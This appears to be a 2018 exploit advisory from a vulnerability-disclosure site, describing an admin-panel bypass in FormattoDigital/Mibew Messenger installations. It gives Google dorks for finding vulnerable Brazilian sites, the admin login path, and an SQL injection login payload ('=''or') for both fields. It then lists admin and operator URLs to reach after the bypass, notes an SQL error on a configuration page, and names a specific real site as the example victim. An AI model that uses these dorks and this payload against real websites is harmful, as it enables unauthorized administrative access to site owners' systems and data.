FormattoDigital Mibew Messenger Open-Source Live Support Software Multiple Vulnerability

2018.05.29
tr KingSkrupellos (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:''Formattoweb'' site:br / inurl:''/site/pagina/sobre/'' site:br

###################################################################################################################### # Exploit Title : FormattoDigital Mibew Messenger 1.6.4 | (c) 2011 Messenger Open-Source Live Support Software Admin Control Panel ByPass Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team # Vendor Homepage : formattodigital.com.br / mibew.org # Date : 28/05/2018 # Tested on : Windows # Exploit Risk : Medium ###################################################################################################################### # Description : Parceiros-PetraHost and Mibew Messenger (also known as Open Web Messenger) is an open-source live support application written in PHP and MySQL. It enables one-on-one chat assistance in real-time directly from your website. # Google Dorks : # intext:''Formattoweb'' site:br # intext:''© 2009-2018 Mibew Messenger project'' # intext:''Mibew Messenger 1.6.4 | (c) 2011 mibew.org'' # intext:'' Página Inicial . Imóveis no Mapa . Sobre Nós . Links Úteis . Fale Conosco # inurl:''/site/pagina/sobre/'' site:br # Admin Login Path : /site/admin/ # Exploit : Username : '=''or' Password : '=''or' # You can use this URL Codes in the Admin Control Panel => /site/admin/ /site/admin/dashboard/itens/ /site/admin/categoria/ /site/admin/subcategoria/ /site/admin/item/novo/ /site/admin/item/ /site/admin/item/busca/ /site/admin/item/posicao/ /site/admin/proprietario/ /site/admin/proprietario/imoveis/ /site/atd/operator/index.php?locale=pt-br /site/atd/operator/settings.php /site/atd/operator/users.php /site/atd/operator/history.php /site/atd/operator/statistics.php /site/atd/operator/canned.php /site/atd/operator/getcode.php /site/atd/operator/operators.php /site/atd/operator/operator.php?op=1 /site/atd/operator/performance.php /site/atd/operator/operator.php /site/atd/operator/themes.php /site/atd/operator/updates.php /site/atd/operator/canned.php /site/atd/operator/cannededit.php?lang=pt-br&group= # Screenshots from Admin Control Panel => cdn.pbrd.co/images/HnfPgVM.png cdn.pbrd.co/images/HnfPpad.png ###################################################################################################################### # SQL Injection Error => If you want to update this page with a long text an SQL Injection error will appear. /site/admin/configuracao/atualizar/ Error 1064 => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 's future ###################################################################################################################### Example Site => executivaimoveisdf.com.br/site/admin => [ Proof of Concept ] => archive.is/j0a4Z ###################################################################################################################### Discovered By KingSkrupellos from Cyberizm Digital Security Team ######################################################################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top